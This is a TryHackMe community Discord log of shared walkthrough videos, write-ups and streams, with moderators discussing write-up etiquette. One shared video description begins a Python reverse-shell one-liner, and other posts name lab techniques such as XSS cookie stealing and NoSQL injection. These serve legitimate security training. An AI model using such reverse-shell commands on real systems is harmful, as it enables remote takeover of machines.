#thm-community-media

1 messages ยท Page 37 of 1

formal sparrow
#

Awesome ๐Ÿ˜

mint solar
#

TryHackMe sticker swags, when

meager compass
#

already exists in the merch shop :)

glacial yacht
graceful coral
#

@graceful coral

rocky iron
#

Ey Latin America, today KOTH in stream at 930 pm gmt-5, CTF with consoles:
https://www.twitch.tv/hackorgame

Twitch

Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.

โ–ถ Play video
olive sundial
#

Let me underline that it's important to pay close attention to details. There's a hidden thm code inside currently unclaimed

tropic dust
olive sundial
olive sundial
#

ghostping?

proper heron
proper heron
#

Back again after dinner break - join me for h4cked ๐Ÿ™‚ link above

tropic lava
#

@willow patrol Hi, this channel is for Streams, videos, blog posts, etc of TryHackMe content so I've deleted your message.

buoyant ruin
#

In this video for our series Pop Pop Pop Another Server Drop, we are popping the Mr Robot vulnerable machine. Things learned in this lesson include:

  1. Nmap for port scanning and arp scanning
  2. Gobuster for directory busting
  3. Wordpress hacking
  4. Password cracking with john the ripper and WPScan
  5. PHP reverse shells
  6. Hashes
  7. Netcat for reverse shells
  8. TTY and how to use python to get a more stable shell
  9. Basic BASH commands
  10. SUID bit
  11. Nmap interactive mode privilege escalation
    So letโ€™s get popping!

https://www.youtube.com/watch?v=ABS91i3vR88

In this video for our series Pop Pop Pop Another Server Drop, we are popping the Mr Robot vulnerable machine. You can find the Virtual Box file here: https://www.vulnhub.com/entry/mr-robot-1,151/ Things learned in this lesson include:

  1. Nmap for port scanning and arp scanning
  2. Gobuster for directory busting
  3. Wordpress hacking
  4. Password cr...
โ–ถ Play video
proper heron
rocky iron
#

Hi people, hi latin american people, today we have KOTH 930 GMT-5:
https://www.twitch.tv/hackorgame

Twitch

Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.

โ–ถ Play video
glacial yacht
glacial yacht
#

Posting a bit late but hope it still helps some of you

iron shadow
#

Hopefully this helps someone

#

guide to go with it ๐Ÿ™‚

summer inlet
torn orchid
glacial yacht
blissful narwhal
ocean nacelle
#

We are live now! making cyber security defence path ~ Windows Logs

blissful narwhal
graceful coral
#

Nice video

#

Good explanation

strange axle
rocky iron
#

Ey today in my channel we have KOTH, ey people from latin america!, if someone wants to particpate, let me to know!;
https://www.twitch.tv/hackorgame

Twitch

Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.

โ–ถ Play video
tribal warren
#

Hey @dry kestrel !
This channel is for TryHackMe only content ๐Ÿ˜„
You can post direct links to write-ups but this isn't the channel to promote your blog :<

If you would like, you can post it in #general -- just as long as you don't excessively promote it :))

dry kestrel
tribal warren
#

No problem :))

humble light
fickle estuary
#

Is there a way i could DM OSINTDojo, creator of Sakura Room?

wintry nebula
#

He's not in this Discord it seems

fickle estuary
wintry nebula
#

Could probably try their Twitter?

fickle estuary
tropic dust
#

site dm

fickle estuary
umbral hatch
proper heron
tropic lava
#

@dark condor As that is not tryhackme community media, I have deleted your message.

proper heron
graceful coral
rocky iron
#

@here hi guys today we have KOTH, latin americans are invited, if someone wants to play with us, you are welcome:
https://www.twitch.tv/hackorgame

Twitch

Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.

โ–ถ Play video
tribal warren
#

https://www.youtube.com/watch?v=g2CnIgjHeX8

8 minutes until itโ€™s live!

Be sure to jump into the TryHackMe Discord! https://discord.gg/tryhackme
Hang with our community on Discord! https://johnhammond.org/discord
If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: http://paypal.me/johnhammond010
Gi...

โ–ถ Play video
lofty crest
#

where is the result of the OSCP draw?

tropic lava
#

They're currently removing cheaters

lofty crest
#

๐Ÿ˜†

proper heron
proper heron
blissful narwhal
uneven wigeon
rocky iron
#

Hi Everyone, today it a KOTH day by streaming, eveyone is welcome!
https://www.twitch.tv/hackorgame

Twitch

Hola mi nombre es Alexis Torres, soy de Peru, trabajo como pentester hace ya casi 8 aรฑos, en la actualidad veo proyectos para latinoamerica , EEUU y Europa, actualmente soy parte de esta comunidad relacionada a seguridad informatica /hacking/pentesting.

โ–ถ Play video
plush moth
tropic lava
#

OverlayFS will work on honestly the majority of THM rooms, because it's so new

graceful coral
uneven wigeon
#

@graceful coral nice 1

flat plinth
#

๐Ÿ“‹ "Hack your way in. Get the Flags. Don't get stung."

๐Ÿ™ Me and ~1800 more hackers was trying to root the box for the chance to get the OSCP voucher and five One Month TryHackMe Subscription Vouchers. With this one I've learned so much that without this write-up everything I've learned would be lost forever. Hereby behold, my 7 days of struggle!

๐Ÿ”ฅ Read my #writeup of "Year of the Jellyfish" hosted by Try Hack Me.
https://ethicalme.hashnode.dev/thm-yotjf

Ethical Me: Hacking for the Security Awareness

Complete write up for Challenge Hacking Box: Year of the Jellyfish hosted by TryHackMe. Learn more from scripts and additional readings.

formal sparrow
#

@flat plinth
Few things not quite correct there:

  • The throttling with the public IP is your ISP -- not the box
  • I didn't change the filter after the event: *.phtml by itself would never have worked. *.gif.phtml still will

Also, please submit to the room for review before sharing publicly ๐Ÿ™‚

flat plinth
#

thanks for telling me that

formal sparrow
#

Nah, just courtesy to let the room creator have a look first

flat plinth
# formal sparrow Nah, just courtesy to let the room creator have a look first

Ah, ok. I just think about it how I approach the challenge and to share with others what my thoughts were during the solving process. Like, I'm not doing the official review or something - it is more like my process and thoughts. But from the other hand I can get a immediate feedback on where my logic went wrong - so that's nice.

#

Thank you for indicating where I can correct the article

vagrant scroll
#

Some THM Wreath over here: https://www.twitch.tv/hey_its_lgg

Twitch

Hi and welcome to the Stream. I'm an Engineer (from Djibouti) currently learning the basics of InfoSec from THM / HTB or other sources. I might also be streaming some games or producing music sometimes. If you haven't already followed me feel free to do so to support this channel. Thank you!

โ–ถ Play video
fallen ice
graceful coral
graceful coral
graceful coral
fallen ice
rocky iron
#

Hi boyz/girlz today we have KOTH in channel, everybody is invited:
https://www.twitch.tv/hackorgame

flat plinth
#

๐Ÿ“‹ "Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!"

๐Ÿ’ก Practical example of reverse shell usage and sudoer understanding.

๐Ÿ”ฅ Read my "Pickle Rick" write-up
๐Ÿ‘‰ https://ethicalme.hashnode.dev/writeup-get-schwifty-pickle-rick

Ethical Me: Hacking for the Security Awareness

You gotta get schwifty in here! Complete write-up for Pickle Rick hacking box from Try Hack Me. Learn hacking for the security awareness.

graceful coral
flat plinth
#

also depends what kind of problem you had

graceful coral
#

@flat plinth Python Payload didn't execute i finally use perl payload to done the shit. I use python payload not a python3 i think that might be the problem

flat plinth
#

well, maybe

worldly fable
#

I3 rice almost finshed looking good and minimilistic

tawny seal
tropic lava
tawny seal
#

Kinda wanted to see what people thought of it, and because I didn't know that was a thing to do ๐Ÿ˜„

tropic lava
#

I'd also appreciate it if you could remove the answers/any passwords

tawny seal
#

Sure, i left out the actual 'main' answer

#

Is the picture with the information included, but not called out acceptable? (like for question 2?)

tropic lava
#

I'd rather it wasn't there, like especially the password

tawny seal
#

oh yea, i'd definitely obfuscate passwords

#

this particular one didn't have any actual passwords

tropic lava
#

I made the room

#

Just this image here, I'd appreciate it if you blocked out the password just below. That sort of thing.

tawny seal
#

ooooohh, that password, sorry, i was thinking flag, sorry!

tropic lava
#

As for this bit, John is fussy. It needs --wordlist=/path

#

also be careful with i vs I, it's always I when you're saying like I did this

tawny seal
#

Ah true, my crappy lazy habits ๐Ÿ™‚

#

Also, I JUST realized this was only part one ๐Ÿคฃ

#

do you consider

So, right off the top, we see an HTTP GET request to /development/, and then a POST to /development/upload.php, which my gut instinct tells me would be the URL, but, as THM helpfully shows us, it's looking for a single world between slashes.

#

to be too close to an answer?

tropic lava
#

A little, but eh. Also, typo - world/word

tawny seal
#

๐Ÿคฆโ€โ™‚๏ธ

#

What I will probably do is complete the rest of the parts that i completely missed, and submit as one big post for the room

graceful coral
uneven wigeon
#

good one @graceful coral

graceful coral
uneven wigeon
#

good1 @graceful coral

junior mantle
#

Reversing ELF TryHackMe | Reverse Engineering | techy krish https://youtu.be/0RF-id8vUk0

DISCALMER

This video is only for educational purposes!

In this video we will learn about...
reverse engineering
back engineering
backwards engineering
tryhackme ctf
reversing elf
radare2
r2
malware analysis
extract info out of binary
reversing challenges
reversing ctf
crackme1
crackme2
crackme3
crackme4
crackme5
crackme6
crackme7
cra...

โ–ถ Play video
graceful coral
peak sentinel
graceful coral
graceful coral
tribal warren
#

@orchid estuary Hey that isn't TryHackMe related ๐Ÿ™‚

graceful coral
graceful coral
spiral heart
#

Complete walkthrough of c4ptur3-th3-fl4g room:
https://youtu.be/mdpnBG6TRW8

This is the complete Walkthrough of TryHackMe room c4ptur3-th3-fl4g.

00:00 - Intro

Task 1 - Translation and Shifting
[00:32] - flag1
[01:51] - flag2 (binary)
[02:14] - flag3 (base32)
[02:32] - flag4 (base64)
[02:49] - flag5 (hexadecimal)
[03:17] - flag6 (rot13)
[03:29] - flag7 (rot47)
[03:51] - flag8 (morse code)
[04:10] - flag9 (bcd)
[05:47]...

โ–ถ Play video
gloomy ruin
uneven wigeon
#

@gloomy ruin u dont need to download the vpn file everytime

#

only once (non sub)

#

is fine as well

gloomy ruin
#

I know, it is in the second video

#

I figured that out

gloomy ruin
uneven wigeon
#

subscription

gloomy ruin
#

yes, no sub

#

I will get it once I am done with my grade 10

#

just gotta concentrate on study now

spice kayak
gloomy ruin
#

Yup

nocturne veldt
gloomy ruin
spice kayak
#

Ok from pins ๐Ÿ“Œ I see that flags are not allowed to be shown . I have some doubts

1)for old rooms do I need to wait for the permission of the author of the room to publish the write-up ?
2) I see write-ups showing the flags for old rooms not the new ones is it ok with that? Coz it may need some lil bit more editing

tropic lava
#

@spice kayak Please do not include flags or passwords (also SSH keys probably count there) in your writeups.
You don't need permission from the creator but it's nice to. That's what submitting it to the room is for, in part.

spice kayak
#

ok

#

i will just dont cat the flags during recording ftw

tropic lava
#

You can wc them, or maybe md5sum them

spice kayak
#

yeah i also though if the same thing wc

uneven wigeon
graceful coral
#

ุงู„ุณู„ุงู… ุนู„ูŠูƒู…

ูŠุงุฑุจ ุชูƒูˆู† โ€ุงุณุชูุฏุช ู…ู† ุงู„ู…ู‚ุทุน ูˆุฅุฐุง ุงุณุชูุฏุช ุงู†ุดุฑ ุงู„ู‰ ุงุฎูˆูŠุงูƒ ุนุดุงู† ูŠุณุชููŠุฏ ู…ู†ู‡โค

ุงุฐูƒุฑ ุงู„ู„ู‡ โค

ุญุณุงุจูŠ ุงู†ุณุชุง: https://www.instagram.com/sirsaddamreal

ุงู„ุณูŠุฑูุฑ ุญู‚ูŠ ููŠ ุงู„ุฏุณูƒูˆุฑุฏ :https://discord.gg/vrrbpqARFk

Disclaimer - video is for educational purpose only. Copyright Disclaimer Under Section 107 of Copyright Act 1976, allowance is made f...

โ–ถ Play video
uneven wigeon
weak quest
#

How can I get the Act of Kindness badge? I thought I need to solve both of the wonderland room and I'll get it. I had to realize I've dove with them.

#

Is it a bug or I have to solve another room?

tribal warren
#

Act of kindness is a community badge

#

Being nice, purchasing vouchers for users, giveaways etc.

weak quest
#

oh

tribal warren
#

Usually youโ€™re commended by a moderator to Skidy

weak quest
#

I thought somehows it connects to the wonderland series

#

Ty for the help

tropic lava
#

That'd be act of Malice or something, those rooms are just mean

green jungle
#

couch tryhackme writeup

arctic geyser
#

https://youtu.be/llMS_0ciFks can i have some traffic towards my channel brothers ๐Ÿ˜

Pickle Rick Walkthrough, with normal web interface and with Python Reverse Shell.

Python Reverse shell:

Just change IP to your tun0 IP and Port to whatever port you want to listen the incoming connection on.

====================================================================

python -c 'import socket,subprocess,os;s=socket.socket(socket....

โ–ถ Play video
edgy jacinth
tepid cloud
stone prism
#

im dead

#

that's amazing

twin solar
#

oh crap I missed an "or"

tepid cloud
#

It's not as "proffesshanoal" as mine.

twin solar
#

Your one is incredible, a true work of art

tepid cloud
#

Yeah

twin solar
#

Much info, many detail

tepid cloud
#

Can't wait till I get my 10 tickets

thin oak
flat plinth
slate crescent
uneven wigeon
copper sinew
arctic geyser
#

can i use tryhackme content (images and animated videos) for creating content on youtube ?

real zodiac
fallow remnantBOT
#

Gave +1 Rep to @real zodiac

real zodiac
fallow remnantBOT
#

Gave +1 Rep to @thin oak

graceful coral
ancient tartan
plush moth
lethal egret
#

Guess it's worth dropping here:
VulnNet: Roasted - Raw take (for the most part)
A great Windows box that utilises a bunch of AD wizardry
https://www.youtube.com/watch?v=5Db2ywExEGc

Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on the leaderboard through any means possible!

This series is being streamed over on my Twitch Channel so go and drop a follow if you want to see more!

Not all boxes will be uploaded but we will get as many as we can o...

โ–ถ Play video
dusky lichen
#

ok i have a doubt can i write blogs / make viedos on subscriber only rooms ?? and networks ?? like throwback and holo

tropic lava
#

Yes

dusky lichen
fallow remnantBOT
#

Gave +1 Rep to @tropic lava

gloomy ruin
proper heron
zinc roost
#

THM wallpaper pack when? ๐Ÿ‘€ .

versed surge
cinder badger
formal iron
#

Interesting idea

#

oooh I wanna make another one with the jetpack man ๐Ÿ˜ฎ

sly hedge
formal iron
#

Dentists hate it ๐Ÿ˜„

#

Nice writeup though!

sly hedge
#

Thank you

sly hedge
# formal iron Nice writeup though!

I have submitted it on the room's page but can't see it there. Should I contact the room's creators for this? Sorry, this is my first time posting ๐Ÿ˜…

brave hill
formal iron
#

ooh there is like 8 pending, lemme sort through them real quick in order of when they submitted

sly hedge
#

Cool thanks โค๏ธ

proper heron
formal iron
sly hedge
#

๐Ÿฅณ just saw that mail :) thanks

formal iron
#

npnp!(:

lethal egret
#

Pain, suffering and memes in this VulnNet: Internal Raw Edit!
https://youtu.be/SuRMLj7YeuM

Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on the leaderboard through any means possible!

This series is being streamed over on my Twitch Channel so go and drop a follow if you want to see more!

Not all boxes will be uploaded but we will get as many as we can o...

โ–ถ Play video
gloomy ruin
#

This is the followup of the first part of the room CC:Pentesting

zinc roost
#

If anyone is streaming some rooms tonight (UK time) please ping me, would be interested to see more experienced folks than me working through things.

lethal egret
proper heron
flat plinth
formal sparrow
#

Especially given I see at least one inaccuracy off the bat

#

Nginx is the load balancer / reverse proxy. Express is the backend.

flat plinth
# formal sparrow Nginx is the load balancer / reverse proxy. Express is the backend.

thanks Muiri for correction, I really appreciate it
but, once again I don't feel like posting the writeup in the room because it is just my interpretation of the solution - are you guys chasing other people posting their writeups of rooms? when you google the "thm uploadvulns" phrase you can see that there are many writeups already, but not a single one in the room writeups - it is just a training one, nothing advances, so you can see the community don't stress much about providing the writeups at the official channel ๐Ÿ™‚

fallow remnantBOT
#

Gave +1 Rep to @formal sparrow

flat plinth
#

I don't find it being rude, to share the THM content and by doing so, giving appreciation to the platform by providing articles about it - I don't see a need to be it accepted on the THM first

formal sparrow
# flat plinth thanks Muiri for correction, I really appreciate it but, once again I don't feel...

No, we're not chasing people for it -- you're getting asked because you're using the official Discord server to advertise your solution, rather than just posting it ๐Ÿ˜„

As a general rule it is polite to ask the room creator to approve it before going out of your way to advertise it. As you say, it's your own solution, so it's a case of making sure that the creator is happy with endorsing it as a solution on the room.
That's more the case for challenges than for walkthroughs, obviously -- Jewel just treads the line between them.

flat plinth
#

from that point of view.. that makes sense - but.. are really all content posted here is accepted beforehand?
and well if I make some mistakes - community can always contact me/write a comment, that's how it suppose to work, right? that way both sides can learn
first YOTJF, then Jewel - I must learn that finally ๐Ÿ˜›

formal sparrow
flat plinth
#

ok I understaind, but is it somewhere written down for new users?

tropic lava
flat plinth
#

removing the post until it got accepted

lethal egret
#

Wonderland Road to Top 50 Raw Edit
https://youtu.be/V19y1Sz3vmg

Let's hack wonderland, this amazing box demonstrates the exploitation of library imports in the Python programming language, PATH manipulation and finally abusing Linux capabilities on the Perl binary to gain root!

Join me as I hack my way to the top of the TryHackMe leaderboard. The goal of this series is to climb to AT LEAST the top 50 on th...

โ–ถ Play video
proper heron
limber coyote
tawny seal
#

Question, regarding writing a blog post, I'm about to start /room/relevant, but it says writeups own't be accepted, but if i did as it suggests and write an actual report and post that to a blog? More of an ethics question than anything else.

stone marsh
#

well, ethically, if a creator asked you not to do that and you do it, its probably mildly unethical.

#

if it was unlisted/private write up I doubt it would be unethical but I assume other people have access to your blog

tawny seal
#

ok, thanks. I wasn't sure if the penetration report would still classify as a "writeup" since, from my brief research it's more of a conclusion/recommendations document, more than a how to (which if it would include, i wouldn't)

stone marsh
#

well a pen-test report needs an attack narrative which is 'what you did to gain access', basically the meat and potatoes of a writeup

#

I imagine that room creator has those requests because they would like their own guides to be the ones referred to, if you are doing something like that for potential employers to look at later I don't think it'd be too bad really

tawny seal
#

ok, yea, there is a guide

#

thank @stone marsh

fallow remnantBOT
#

Gave +1 Rep to @stone marsh

formal sparrow
# tawny seal Question, regarding writing a blog post, I'm about to start /room/relevant, but ...

For your own blog, go ahead :)
Please keep flags/passwords out as a common courtesy, but blog post reports are good for rรฉsumรฉs ๐Ÿ˜„
Just bear in mind that it won't be accepted to the room, and we won't advertise it in here (I.e. please don't post links to it in the Discord/subreddit). In terms of writing it though? Go for it. It's not like there isn't already an official walkthrough for it ๐Ÿคทโ€โ™‚๏ธ

tawny seal
#

It might take me a year and a half to get through it though. first thing that's "freeform"

graceful coral
#
formal sparrow
#

You are going to kill my eyes ๐Ÿ˜†

#

*Cue 240% zoom*

tribal warren
#

Looks fine on mobile

#

Seems like a you problem~ catvibin

#

Trillium pfft

formal sparrow
#

Wrong image ๐Ÿ˜†

tribal warren
#

Haha, trying to squeeze it into the conversation, I see you

formal sparrow
#

@urban crescent how does it look on an ultra-wide? ๐Ÿ‘€

tribal warren
cobalt plover
#

I need glasses

formal sparrow
#

Same ๐Ÿ˜†

urban crescent
#

even smaller on mine

formal sparrow
#

Loving the content though

graceful coral
#

Displaying fine on mobile PES_CoolKing

#

Well written and accurate though, will recommend to anyone who wants to join infosec

graceful coral
#

amusingly

#

I wrote it on an UW and it looked fine to me kekw

graceful coral
#

Beep Beep dash dash mofo

graceful coral
#

Display is fine on 24" 1080p monitor aswell prayge

torn orchid
#

am trying to do wreath with as less help from the walkthrough in the room: https://www.twitch.tv/mrzeeqa, feel free to give me some feedback if you all don't mind

formal sparrow
#

Trying to do it blind is entirely missing the point ๐Ÿ˜†

torn orchid
#

But i understand your point though. Wreath is actually a well explained walkthrough. So i'm challenging myself to see whether or not i understood what was being explained

formal sparrow
#

Ah, gotcha ๐Ÿ‘

torn orchid
#

You did a great job i believe, already on the gitstack and haven't peaked at my answers. Your way of explaining can be longdreaded sometimes, but it's all coherent so it sticks for the most part

#

I remember wreath explained pivoting at one point, which made me come to the conclusion it's not necessary to upload a nmap binary on prod-serv, but rather i can use sshuttle to route the traffic via ssh specifying the id_rsa with --ssh-command

torn orchid
spice palm
#

@tropic lava

crystal mesa
cloud wagon
#

Hi, where can I ask questions about the progress of my thm room and other stuff about room creation?

formal sparrow
tropic dust
#

nvrmnd

fallow remnantBOT
#

Gave +1 Rep to @formal sparrow

tribal warren
tropic dust
#

i was about to post it...

tribal warren
#

๐Ÿ˜

teal totem
#

i

#

am

#

going to give

#

this a shot

#

๐Ÿ˜Ž

mossy cliff
#

wopah ๐Ÿฅบ

tranquil pumice
#

Anyone know how can I share my profile on LinkedIn?

tranquil pumice
#

Oh thatโ€™s it lol. I thought I can share it directly from THM.๐Ÿ™ˆ

tribal warren
#

@tropic lava

tropic lava
#

Done

tribal warren
#

Thanks:D

ionic yarrow
#

How can I upload gif image as profile pic in Try Hack Me ?

stone marsh
wide yacht
tropic lava
#

@graceful coral Please try to keep it to just THM content here

graceful coral
#

Ah ok, will do.

open estuary
lime cosmos
uneven wigeon
#

hey hey, its a nice one just a lil typo here

tropic lava
#

@queen jackal This channel is for Streams, videos, blog posts, etc of TryHackMe content

queen jackal
#

oh I'm sorry

#

is there any room where I could share that video about note taking for the CySA+ ?

graceful coral
frigid wind
#

Hey so I made this for people that want their tryhackme badge on their github profile README for some reason if I just linked it with the aws link it wouldn't work so here is a github action that just downloads the image and uploads it on a repo you own to be linked in the README https://github.com/p4p1/tryhackme-badge-workflow

GitHub

A simple github action to retrieve tryhackme static badge image and display it on your profile README - GitHub - p4p1/tryhackme-badge-workflow: A simple github action to retrieve tryhackme static b...

#

I don't really know where to posts this so ping me if it's not the correct channel

formal sparrow
frigid wind
#

Hahaha no way ๐Ÿ™‚

#

I just checked for me it hasn't been fixed for some reason well at least it exists for people that are interested ๐Ÿ™‚

formal sparrow
#

Not sure it's been pushed yet, but it's definitely fixed in dev

copper crest
stable heron
queen jackal
#

Hey everyone! ๐Ÿ˜Ž

Just in case there's anyone here going through the latest TryHackMe Learning Path!

I just did a walkthrough for the first Room ๐Ÿฅณ

Hope you enjoy it! ๐Ÿ€ ๐Ÿ˜Š

https://www.youtube.com/watch?v=95cOZkQtNUc&t=237s

Hey everyone!

This video is a walkthrough of the TryHackMe's Penetration Testing Fundamentals Room!

Summary:
0:00 - Intro
1:33 - Task 1
2:36 - Task 2
8:42 - Task 3
14:10 - Task 4
17:17 - Task 5
24:02 - Conclusion

Links to all Study Resources:
Sibex Study Guide and Practice Tests - https://bit.ly/3cWQfyh
Jason Dion's Complete Course - https:/...

โ–ถ Play video
formal iron
#

awesome @queen jackal but a good consideration if you want to do youtube videos, is to consider whether images like that (the images/components in the thumbnail) are actually yours/you have the rights to use (:

queen jackal
#

you are absolutely right @formal iron ! I might have take that for granted, I'm sorry!
Do you know who I can contact from TryHackMe to ask for permission for future walkthroughs?
Thank you so much for your kind advice ๐Ÿ™‚

fallow remnantBOT
#

Gave +1 Rep to @formal iron

tropic lava
#

@stable heron this channel is for directly THM related content

queen jackal
#

@formal iron just sent you a message on twitter, asking for permission to do a walkthrough of your Room ๐Ÿ™‚

formal iron
#

hello I will get to it when I'm out of my lectures (:

#

@queen jackal

queen jackal
#

Thank you!

tropic lava
#

You could walk through other content

queen jackal
#

Thank you for responding on Twitter Ben! @formal iron !
I really appreciate it ๐Ÿฅณ

fallow remnantBOT
#

Gave +1 Rep to @formal iron

fallow remnantBOT
#

Gave +1 Rep to @queen jackal

formal sparrow
tame ledge
#

Letโ€™s eat, grandpa. vs Letโ€™s eat grandpa.

queen jackal
#

Ahah xD

formal iron
#

When I am on mobile

#

English standards and rules do not apply ๐Ÿ˜„

#

If you can depjyjer it then god speed

oblique crow
queen jackal
#

Here's the walkthrough of the second room from the newest learning path, Jr Penetration Tester ๐Ÿ™‚

Hope you enjoy it!

https://www.youtube.com/watch?v=thD8JMEJ_I0&t=498s

This video is a walkthrough of the TryHackMe's Principles of Security Room! ๐Ÿฑโ€๐Ÿ’ป

Here's the link to the room: https://tryhackme.co/room/principlesofsecurity

Also, make sure you follow Ben, he's the creator of this room!
All credit goes to him ๐Ÿ˜Š
Twitter: https://twitter.com/CMNatic
TryHackMe: https://tryhackme.com/p/cmnatic

Summary:
0:00 - Int...

โ–ถ Play video
tropic lava
#

@stable heron this channel is for THM related content

oblique crow
oblique crow
oblique crow
vernal palm
lime cosmos
strange pelican
strange pelican
silver topaz
tropic lava
#

@spiral heart Is this tryhackme related?

formal iron
#

xpost from #general but hello good morning

#

I will play some ETS2
And then
stream in vc
I need to look into/fix the Yara room

#

Since people seemed to enjoy last nights

raw yoke
tropic dust
#

sharing third time? ๐Ÿค”

tropic lava
#

@lime cosmos Please stop reposting the same video, it's turning into advertising.

lime cosmos
#

ok ๐Ÿ™‚

storm cave
#

Hey I have uploaded the walkthrough of today's Day 5 challenge by two methods - one is the intended path and another by stealing cookie from target. 2nd method is at Timestamp 3:50.
https://www.youtube.com/watch?v=Y8Ny5y2FXcA

#XSS #Cookie #Adventofcyber3 #2021 #webapp
This video contains walkthrough of Day 4's task from Advent of Cyber 2021. We will solve by two methods one intended method of tryhackme and another with cookie stealing and both will involve Cross-Site Scripting(XSS) - another web vulnerability. More will follow this videos as new tasks are released da...

โ–ถ Play video
graceful coral
#

nice method 2

wooden geyser
queen jackal
#

Hey everyone! I have a question
When we make a walkthrough, do we have to blur all the answers or just the flags?
Because some of the more beginner friendly answers are written on the question itself, or even on text above the question, so its almost impossible not to "read" the answers, before we even start the practical hacking part. So it's hard to bleep/blur everythin

What should we do?

graceful coral
queen jackal
#

That's actually one way to do it! Thank you @graceful coral

fallow remnantBOT
#

Gave +1 Rep to @umbral charm

tropic lava
queen jackal
#

Got it! Maybe I should just focus more on the rooms that only have the practical approach and blur the flags in the end (?)

#

So that people can learn the methodology but have to put it the work to get the answers

storm cave
#

Hey this is my walkthrough on day7 of Advent of cyber
https://youtu.be/xlXDHqENMUo

#NoSQL #Injection #Adventofcyber3 #2021 #webapp
This video contains walkthrough of Day 7's task from Advent of Cyber 2021. We will work with MongoDB and do NoSQL injection attack on target website that operates on mongoDB. More will follow this videos as new tasks are released daily.

Link to tryhackme page - https://tryhackme.com/room/adventofc...

โ–ถ Play video
tropic lava
#

@strange pelican Is this tryhackme related?

strange pelican
#

No Sorry, hahaha my fail, is for other community

distant copper
distant copper
distant copper
distant copper
graceful coral
distant copper
storm cave
#

I have also added the script to list all answers automatically but you will need to find the AWS Access Key ID and other stuff from file

storm cave
mild crater
graceful coral
storm cave
oblique crow
tropic lava
#

AoC2? I've been here since Hackback2!

oblique crow
#

I guess we're not the same?

tropic lava
#

@heavy kindle This channel is for THM content like YouTube videos of THM rooms, or writeups.

heavy kindle
fast gorge
#

Looks really nice and professional.

fast gorge
sullen charm
# fast gorge

What's that autocomplete action going on in your video?

fast gorge
sullen charm
graceful coral
sullen charm
graceful coral
# sullen charm What music are you playing on your VOD that you don't get a copyright strike?

4K ๐Ÿ”ด Lofi Hip Hop Beats 24/7 Radio ๐Ÿ”ด No Copyright Lofi Beats to sleep/ study to
Instructions about using the lo-fi songs, below in the description.
Follow my Spotify Lo-Fi Playlist: https://spoti.fi/3dTH2FN

Commands for the chat:
!menu ( to see the full bar's menu )
!rain
!joke
!love
!time
!winner

Welcome to the Lo-Fi Cafe. The perfect place t...

โ–ถ Play video
#

There are a couple others I use

#

Enjoy this cozy fall coffee shop ambience with relaxing jazz music and rain sounds for studying, relaxation, and sleep. It's a rainy autumn night. Watch falling leaves and listen to the soothing sounds of heavy rain, smooth jazz, and ambient coffee shop noise including soft conversation and gentle clinks of dishes. This dimly lit late night cafe...

โ–ถ Play video
#

And any of the Streambeats by Harris Heller

sullen charm
#

I currently have music during live streams, but the stream is separate so it doesn't get me schwacked in the vod

#

Glad to see in not the only one who has issues just getting started while I'm trying to stream. I gave ya a follow

graceful coral
graceful coral
graceful coral
pseudo coral
#

God, I love the art sometimes. Most times, actually!

ember verge
#

can you give me the room link?

uneven wigeon
#

osi room

formal sparrow
#

Two things:
A) Answer dumps are not writeups. Indeed, there's an explicit instruction when you submit writeups to THM rooms that they should not contain answers. Besides that, it doesn't do you any favours to simply reveal answers. If you want your writeups to be respected + beneficial to you (and the community at large) they need to explain how you reached an answer, without revealing the answer itself.

B) Have you had those accepted on the rooms before posting them here? I would suspect not (for the above reason). As a heads up, if the writeups have not been accepted to the room, we don't give them an audience in here (especially if it's for community submitted rooms, out of respect for the creator -- although that doesn't apply here).

#

As a side note as well: writeups for walkthroughs are generally not a good idea. They tend to either be answer dumps (which are objectively bad), or the writeup author attempting to explain the content of the room themselves.
That latter one is fine to host on your own platform, but attempting to attach it to the room is... insulting, to say the least, because it tells the creator that you think they've done an inadequate job, thus necessitating your own explanation.

graceful coral
#

It be that way sometimes

sullen charm
#

I'm genuinely surprised more people don't share their journey, but maybe I'm weird

gleaming sundial
sullen charm
#

I like having study buddies and like to see how other people make it through it all

modern jolt
#

I've posted a short explainer of the log4j vuln - https://youtu.be/wyp2tCBY8jw
A walkthrough of the Solar room is coming soon!

In this video, I give an overview of what Log4Shell is and why its impact is so significant. Look out for Episode 2 of the series, where I show you TryHackMe's Solar room!
---LINKS---
John Hammond's video: https://www.youtube.com/watch?v=7qoPDq41xhQ
TryHackMe's Solar room: https://tryhackme.com/room/solar
SANS Holiday Hack Challenge 2021: https:...

โ–ถ Play video
modern jolt
# tropic dust seems good.

Thanks! Trying to churn out some more content before I get back into studying in the next couple of daysโ€ฆ

fallow remnantBOT
#

Gave +1 Rep to @tropic dust

graceful coral
tropic lava
# graceful coral Do you have examples of what a write-up *should* be?

There are a few ways of going about it. The easiest is a walkthrough of the room explaining what you did and why. You can improve that by showing what didn't work and perhaps why it didn't work.
You could also write a full pentest report style format, if it's appropriate (boot2root etc)

formal sparrow
# graceful coral Do you have examples of what a write-up *should* be?

Not off the top off the top of my head (well, none that I didn't write).
As James said, it should basically be an explanation of your thought process when working on a challenge. What worked, what didn't work, why did you try what you did?
You explain how you reached the answers, without actually revealing the answers.

graceful coral
#

Ill give both your suggestions a try, I haven't submitted a write-up for a box yet but Id def like to!

#

Thanks! @tropic lava @formal sparrow

fallow remnantBOT
#

Gave +1 Rep to @tropic lava

graceful coral
graceful coral
manic snow
tropic lava
graceful coral
gleaming sundial
tropic lava
#

You have to worry about copyright and licensing.

gleaming sundial
